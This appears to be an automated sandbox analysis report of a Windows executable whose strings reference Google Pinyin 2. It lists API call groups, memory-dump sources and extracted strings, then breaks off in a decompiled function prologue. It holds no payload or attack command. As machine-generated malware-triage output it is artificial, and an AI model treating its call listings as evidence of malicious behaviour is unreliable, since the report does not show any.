                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FilePointer$_malloc$CloseHandle_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3969787500-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0045452B
                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004545A7
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 004545F6
                                                                                                                                                                    • __cftoe.LIBCMT ref: 00454642
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$CloseConnectHandle__cftoe_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2321452383-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004DC0F3
                                                                                                                                                                    • _memset.LIBCMT ref: 004DC113
                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,?,?,?,?,?), ref: 004DC137
                                                                                                                                                                    • GetShortPathNameW.KERNEL32 ref: 004DC162
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: NamePath_memset$FullShort
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4143433519-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0040E545
                                                                                                                                                                    • _memmove.LIBCMT ref: 0040E56B
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000,?,?,?,00000000,0043A5F7,09D48295,09D48295,09D482B1,?,09D48295), ref: 0040E5B6
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,00000000,00000000,?,00000000,0043A5F7,09D48295,09D48295,09D482B1,?,09D48295), ref: 0040E5D6
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value_memmove_memsetlstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1178772764-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A0DB
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A101
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A197
                                                                                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 0040A1B2
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LockitLockit::_std::_$Facet_Registerstd::locale::facet::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3374953348-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0044037B
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004403A1
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00440437
                                                                                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 00440452
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LockitLockit::_std::_$Facet_Registerstd::locale::facet::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3374953348-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A42B
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A451
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A4E7
                                                                                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 0040A502
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LockitLockit::_std::_$Facet_Registerstd::locale::facet::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3374953348-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A55B
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A581
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A617
                                                                                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 0040A632
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LockitLockit::_std::_$Facet_Registerstd::locale::facet::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3374953348-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0043A415
                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,00514D60,000000FF), ref: 0043A427
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,?,00514D60,000000FF), ref: 0043A465
                                                                                                                                                                    • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 0043A46C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentInitializeSizeUninitializeWorking
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 683297732-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SafeArrayCopy.OLEAUT32(?), ref: 00469673
                                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(?,?), ref: 0046967F
                                                                                                                                                                      • Part of subcall function 00401050: __CxxThrowException@8.LIBCMT ref: 00401062
                                                                                                                                                                      • Part of subcall function 00401050: _memcpy_s.LIBCMT ref: 00401078
                                                                                                                                                                    • VariantClear.OLEAUT32(0055FE18), ref: 004696E5
                                                                                                                                                                    • SysAllocString.OLEAUT32(0052FC70), ref: 00469705
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArraySafe$AllocClearCopyException@8StringThrowVariantVartype_memcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1406359233-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000007,?,00404849,?,?,0000001A,?,?,0000000D), ref: 0043C31E
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00404849,?,?,0000001A,?,?,0000000D), ref: 0043C32E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateEventHandle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3369476804-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,09D48295,?,?,00000001,?,0050E328,000000FF,004D48E8,?,09D48295,?,?,00000001,00000000,0050FB63), ref: 00461790
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0046179E
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004617A8
                                                                                                                                                                    • CloseHandle.KERNEL32(?,09D48295,?,?,00000001,?,0050E328,000000FF,004D48E8,?,09D48295,?,?,00000001,00000000,0050FB63), ref: 004617C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CriticalDeleteSection
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2166061224-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(5C313838,00000007), ref: 004DC7FA
                                                                                                                                                                    • TerminateProcess.KERNEL32(34393839,00000000,00000007), ref: 004DC802
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(34393839,00001388), ref: 004DC811
                                                                                                                                                                    • CloseHandle.KERNEL32(34393839), ref: 004DC81B
                                                                                                                                                                      • Part of subcall function 004DCE50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004DCEAC
                                                                                                                                                                      • Part of subcall function 004DCE50: _memset.LIBCMT ref: 004DCEDF
                                                                                                                                                                      • Part of subcall function 004DCE50: Process32FirstW.KERNEL32 ref: 004DCEFB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CreateFirstObjectProcessProcess32SingleSnapshotTerminateToolhelp32Wait_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 400774340-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 004F8126
                                                                                                                                                                      • Part of subcall function 004F7212: __getptd_noexit.LIBCMT ref: 004F7215
                                                                                                                                                                    • __getptd.LIBCMT ref: 004F813D
                                                                                                                                                                    • __lock.LIBCMT ref: 004F815B
                                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 004F816F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1314619503-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,00420579), ref: 004617FD
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,00420579), ref: 00461811
                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00461832
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00461839
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeaveMutexRelease
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3651273703-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memmove.LIBCMT ref: 004444D9
                                                                                                                                                                      • Part of subcall function 0041CE40: std::_Xinvalid_argument.LIBCPMT ref: 0041CE52
                                                                                                                                                                      • Part of subcall function 0041CE40: _memmove.LIBCMT ref: 0041CE7B
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0044474B
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argument_memmovestd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                    • API String ID: 3981141188-3788999226
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004152B5
                                                                                                                                                                      • Part of subcall function 00414A90: _memset.LIBCMT ref: 00414B44
                                                                                                                                                                      • Part of subcall function 00414A90: PathCombineW.SHLWAPI(?,?,?,?,?,09D48295,?), ref: 00414B74
                                                                                                                                                                      • Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$CombinePath_memmove
                                                                                                                                                                    • String ID: index$userdict
                                                                                                                                                                    • API String ID: 3787016909-1066451248
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4
                                                                                                                                                                    • _memmove.LIBCMT ref: 004243A0
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0042457D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argument_malloc_memmovestd::_
                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                    • API String ID: 1664685438-3788999226
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                                                                    • String ID: <
                                                                                                                                                                    • API String ID: 1413715105-4251816714
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00405450: std::_Xinvalid_argument.LIBCPMT ref: 004054B0
                                                                                                                                                                      • Part of subcall function 00405450: _memmove.LIBCMT ref: 00405506
                                                                                                                                                                      • Part of subcall function 0040E1F0: RegQueryValueExW.ADVAPI32 ref: 0040E240
                                                                                                                                                                    • _wcsncpy.LIBCMT ref: 00414737
                                                                                                                                                                      • Part of subcall function 00405050: RegCloseKey.ADVAPI32(00000000,09D48295,00000000,00000000,0050F9D8,000000FF,0040E97D,00000000,00000000), ref: 004050B2
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseQueryValueXinvalid_argument_memmove_wcsncpystd::_
                                                                                                                                                                    • String ID: DataPath$Software\Google\Google Pinyin 2
                                                                                                                                                                    • API String ID: 2055595451-3352248130
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memmove.LIBCMT ref: 004B945B
                                                                                                                                                                    • _memmove.LIBCMT ref: 004B9493
                                                                                                                                                                      • Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
                                                                                                                                                                      • Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
                                                                                                                                                                      • Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234
                                                                                                                                                                    Strings
                                                                                                                                                                    • CHECK failed: (&from) != (this): , xrefs: 004B93F5
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection_memmove$EnterException@8LeaveThrow
                                                                                                                                                                    • String ID: CHECK failed: (&from) != (this):
                                                                                                                                                                    • API String ID: 673156548-2589368188
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memmove.LIBCMT ref: 0045273E
                                                                                                                                                                      • Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
                                                                                                                                                                      • Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
                                                                                                                                                                      • Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterException@8LeaveThrow_memmove
                                                                                                                                                                    • String ID: CHECK failed: (&from) != (this): $h5S
                                                                                                                                                                    • API String ID: 499820034-857661300
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SHCreateDirectory.SHELL32(00000000,?), ref: 0040F754
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040F75E
                                                                                                                                                                      • Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateDirectoryErrorLast_memmove
                                                                                                                                                                    • String ID: Crash
                                                                                                                                                                    • API String ID: 2233950024-371843035
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,CommonSettings,00000000,?,?,?,09D48295,00000000,?,00000000,?,?,?,?,00000000,005158C8), ref: 00412095
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?,?,?,?,00000000,005158C8,000000FF,00411E38), ref: 0041210D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$Query
                                                                                                                                                                    • String ID: CommonSettings
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,09D48295), ref: 0040F365
                                                                                                                                                                    • GetUserNameW.ADVAPI32 ref: 0040F398
                                                                                                                                                                    Strings
                                                                                                                                                                    • Software\Google\Google Pinyin 2 Preferences, xrefs: 0040F3A8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                    • String ID: Software\Google\Google Pinyin 2 Preferences
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004055D5
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                    • _memmove.LIBCMT ref: 00405622
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00426307
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                      • Part of subcall function 00404190: __invoke_watson.LIBCMT ref: 004041B2
                                                                                                                                                                    • _memmove.LIBCMT ref: 00426336
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument__invoke_watson_memmovestd::_
                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove_s
                                                                                                                                                                    • String ID: Google\Google Pinyin 2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004616C2
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004616D8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040FD60: RegOpenCurrentUser.ADVAPI32(0002011F,?), ref: 0040FDE7
                                                                                                                                                                      • Part of subcall function 0040FD60: RegCloseKey.ADVAPI32(?,00000000,0002011F), ref: 0040FE1A
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,FirstLaunch,00000000,?,?,?), ref: 004045B4
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,FirstLaunch,00000000,00000004,?,00000004), ref: 004045F0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$CloseCurrentOpenQueryUser
                                                                                                                                                                    • String ID: FirstLaunch
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040554F
                                                                                                                                                                      • Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE3F0
                                                                                                                                                                      • Part of subcall function 004EE3DB: __CxxThrowException@8.LIBCMT ref: 004EE405
                                                                                                                                                                      • Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE416
                                                                                                                                                                    • _memmove.LIBCMT ref: 0040558A
                                                                                                                                                                    Strings
                                                                                                                                                                    • invalid string position, xrefs: 0040554A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                    • String ID: u7I
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                    			E100204C0(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				char _v44;
                                                                                                                                                                    				char _v311;
                                                                                                                                                                    				char _v312;
                                                                                                                                                                    				char _v575;
                                                                                                                                                                    				char _v576;
                                                                                                                                                                    				long _v580;
                                                                                                                                                                    				intOrPtr _v584;
                                                                                                                                                                    				intOrPtr _v588;
                                                                                                                                                                    				intOrPtr _v592;
                                                                                                                                                                    				intOrPtr _v596;
                                                                                                                                                                    				intOrPtr _v600;
                                                                                                                                                                    				intOrPtr _v604;
                                                                                                                                                                    				intOrPtr _v608;
                                                                                                                                                                    				intOrPtr _v612;
                                                                                                                                                                    				intOrPtr _v616;
                                                                                                                                                                    				intOrPtr _v620;
                                                                                                                                                                    				intOrPtr _v624;
                                                                                                                                                                    				intOrPtr _v628;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t46;
                                                                                                                                                                    				int _t47;
                                                                                                                                                                    				void* _t56;
                                                                                                                                                                    				void* _t57;
                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                    				int _t75;
                                                                                                                                                                    				int _t77;
                                                                                                                                                                    				void* _t101;
                                                                                                                                                                    				intOrPtr _t104;
                                                                                                                                                                    				void* _t108;
                                                                                                                                                                    				void* _t109;
                                                                                                                                                                    				void* _t111;
                                                                                                                                                                    				intOrPtr _t114;
                                                                                                                                                                    				void* _t115;
                                                                                                                                                                    				intOrPtr _t116;
                                                                                                                                                                    				intOrPtr _t118;
                                                                                                                                                                    				intOrPtr _t120;
                                                                                                                                                                    				void* _t125;
                                                                                                                                                                    
                                                                                                                                                                    				_t125 = __eflags;
                                                                                                                                                                    				_t100 = __edi;
                                                                                                                                                                    				_t82 = __ebx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(E10022D01);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				 *[fs:0x0] = _t104;
                                                                                                                                                                    				_push(_t101);
                                                                                                                                                                    				E1001FD60();
